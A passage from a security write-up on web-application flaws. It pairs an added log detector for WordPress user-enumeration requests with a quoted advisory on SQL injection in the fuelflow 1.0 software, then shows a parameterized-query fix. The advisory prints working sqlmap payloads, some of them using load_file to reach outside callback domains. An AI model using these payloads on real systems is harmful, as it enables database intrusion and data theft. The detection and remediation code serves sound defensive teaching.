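The PoC above reaches the users collection through the rest_route query parameter rather than the /wp-json/wp/v2/users path, and the "link" value in its output points at the older ?author=N probe. The following is an added example, not part of the write-up: a log-side detector that reads combined-format access log lines and flags all three request shapes, so that enumeration attempts are visible even where the endpoint itself cannot be disabled. The log lines are constructed.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Added example, not part of the original write-up: flag user-enumeration requests
# in Apache/Nginx combined-format access logs. The sample lines below are constructed.

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) '
)

REST_USERS = "/wp/v2/users"


def classify_request(target):
    """Return a short reason if the request target looks like user enumeration, else None."""
    parts = urlsplit(target)
    path = unquote(parts.path)
    query = parse_qs(parts.query)  # parse_qs percent-decodes the values for us
    if "/wp-json" + REST_USERS in path:
        return "REST users endpoint by path"
    for route in query.get("rest_route", []):
        if route.startswith(REST_USERS):
            return "REST users endpoint via rest_route"
    if any(v.isdigit() for v in query.get("author", [])):
        return "author id probe"
    return None


def scan_access_log(lines):
    """Return a list of (client ip, status, reason) for each matching request, in log order."""
    hits = []
    for line in lines:
        match = LOG_RE.match(line)
        if not match:
            continue  # not a combined-format line; skip rather than guess
        reason = classify_request(match["target"])
        if reason:
            hits.append((match["ip"], match["status"], reason))
    return hits


SAMPLE_LOG = [  # constructed lines
    '203.0.113.7 - - [21/Feb/2024:10:15:02 +0000] "GET /wp-json/?rest_route=/wp/v2/users/ HTTP/1.1" 200 812 "-" "curl/8.4.0"',
    '203.0.113.7 - - [21/Feb/2024:10:15:03 +0000] "GET /index.php?rest_route=%2Fwp%2Fv2%2Fusers%2F1 HTTP/1.1" 200 640 "-" "curl/8.4.0"',
    '198.51.100.4 - - [21/Feb/2024:10:15:04 +0000] "GET /wp-json/wp/v2/posts?per_page=5 HTTP/1.1" 200 2210 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [21/Feb/2024:10:15:05 +0000] "GET /?author=1 HTTP/1.1" 301 0 "-" "python-requests/2.31"',
    '198.51.100.9 - - [21/Feb/2024:10:15:06 +0000] "GET /wp-json/wp/v2/users HTTP/1.1" 401 95 "-" "python-requests/2.31"',
]

if __name__ == "__main__":
    for ip, status, reason in scan_access_log(SAMPLE_LOG):
        print(f"{ip} {status} {reason}")
```

The status column is kept on purpose: a 200 on the users collection tells you the site currently discloses usernames, while a 401 or 403 shows a restriction is in place and the line is only reconnaissance noise.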
<pre><code>## Title: fuelflow-1.0-Copyright-©-2024-Project-Develop-by-Mayuri-K-Multiple-SQLi<br />## Author: nu11secur1ty<br />## Date: 02/21/24<br />## Vendor: https://www.mayurik.com/<br />## Software: https://www.mayurik.com/source-code/P3584/best-petrol-pump-management-software<br />## Reference: https://portswigger.net/web-security/sql-injection<br /><br />## Description:<br />The email parameter appears to be vulnerable to SQL injection attacks.<br />The payload '+(select<br />load_file('\\\\pibamkpyl8vvxbe3ljxtlrrih9n2buzl29uwkk9.tupaputka.com\\xvb'))+'<br />was submitted in the email parameter. This payload injects a SQL<br />sub-query that calls MySQL's load_file function with a UNC file path<br />that references a URL on an external domain. The application<br />interacted with that domain, indicating that the injected SQL query<br />was executed. The attacker can receive very sensitive information<br />about this system by using these vulnerabilities!<br /><br />STATUS: HIGH-Vulnerability<br /><br />[+]Payload:<br />```mysql<br />---<br />Parameter: email (POST)<br /> Type: boolean-based blind<br /> Title: OR boolean-based blind - WHERE or HAVING clause<br /> Payload: email=-5782' OR 2852=2852 OR<br />'nYvi'='GjbH&password=h3I!y3o!F9&submit=<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or<br />GROUP BY clause (FLOOR)<br /> Payload: email=mOsqQatz@burpcollaborator.net'+(select<br />load_file('\\\\pibamkpyl8vvxbe3ljxtlrrih9n2buzl29uwkk9.oastify.com\\xvb'))+''<br />AND (SELECT 9621 FROM(SELECT COUNT(*),CONCAT(0x7178706271,(SELECT<br />(ELT(9621=9621,1))),0x7178787671,FLOOR(RAND(0)*2))x FROM<br />INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) OR<br />'BiVP'='cVHj&password=h3I!y3o!F9&submit=<br /><br /> Type: stacked queries<br /> Title: MySQL >= 5.0.12 stacked queries (comment)<br /> Payload: email=mOsqQatz@burpcollaborator.net'+(select<br 
/>load_file('\\\\pibamkpyl8vvxbe3ljxtlrrih9n2buzl29uwkk9.oastify.com\\xvb'))+'';SELECT<br />SLEEP(7)#&password=h3I!y3o!F9&submit=<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: email=mOsqQatz@burpcollaborator.net'+(select<br />load_file('\\\\pibamkpyl8vvxbe3ljxtlrrih9n2buzl29uwkk9.oastify.com\\xvb'))+''<br />AND (SELECT 3257 FROM (SELECT(SLEEP(7)))QSTs) OR<br />'Lshu'='MGpY&password=h3I!y3o!F9&submit=<br />---<br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2024/fuelflow-1.0-Copyright-%C2%A9-2024-Project-Develop-by-Mayuri-K-Multiple-SQLi)<br /><br />## Proof and Exploit:<br />[href](https://www.nu11secur1ty.com/2024/02/fuelflow-10-copyright-2024-project.html)<br /><br />## Time spent:<br />00:35:00<br /></code></pre>
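Every payload in the sqlmap output above works only because the email value is spliced into the SQL text of the login query. The following is an added example, not the vendor's code: the same login query written twice in Python against an in-memory SQLite table, once by string concatenation and once with bound parameters, then fed the boolean-based payload quoted above. The table, its single row and the plaintext password column are constructed for illustration only; a real application compares password hashes.

```python
import sqlite3

# Added example, not the vendor's code: the login-query pattern the sqlmap output
# exercises, shown with string concatenation and with bound parameters. Table
# contents are constructed; a real application stores and compares password hashes.


def demo_connection():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT, password TEXT)")
    conn.execute("INSERT INTO users (email, password) VALUES ('admin@example.test', 'correct-horse')")
    conn.commit()
    return conn


def login_concatenated(conn, email, password):
    """Vulnerable form: untrusted input becomes part of the SQL text."""
    sql = f"SELECT id FROM users WHERE email = '{email}' AND password = '{password}'"
    return conn.execute(sql).fetchone()


def login_parameterized(conn, email, password):
    """Fixed form: the SQL text is constant, input travels as bound values."""
    sql = "SELECT id FROM users WHERE email = ? AND password = ?"
    return conn.execute(sql, (email, password)).fetchone()


# The boolean-based payload quoted in the advisory, as it arrives in the email parameter.
BOOLEAN_PAYLOAD = "-5782' OR 2852=2852 OR 'nYvi'='GjbH"


def demonstrate():
    """Return (row from the vulnerable query, row from the fixed query) for the injected email."""
    conn = demo_connection()
    return (
        login_concatenated(conn, BOOLEAN_PAYLOAD, "wrong-password"),
        login_parameterized(conn, BOOLEAN_PAYLOAD, "wrong-password"),
    )


if __name__ == "__main__":
    vulnerable, fixed = demonstrate()
    print("concatenated query returned:", vulnerable)   # a row: the OR 2852=2852 clause is always true
    print("parameterized query returned:", fixed)       # None: the payload is just an unknown email
```

With concatenation the resulting statement reads WHERE email = '-5782' OR 2852=2852 OR 'nYvi'='GjbH' AND password = 'wrong-password', and the always-true middle clause returns the first user regardless of the password; with a bound parameter the whole payload is compared as one literal email string and matches nothing.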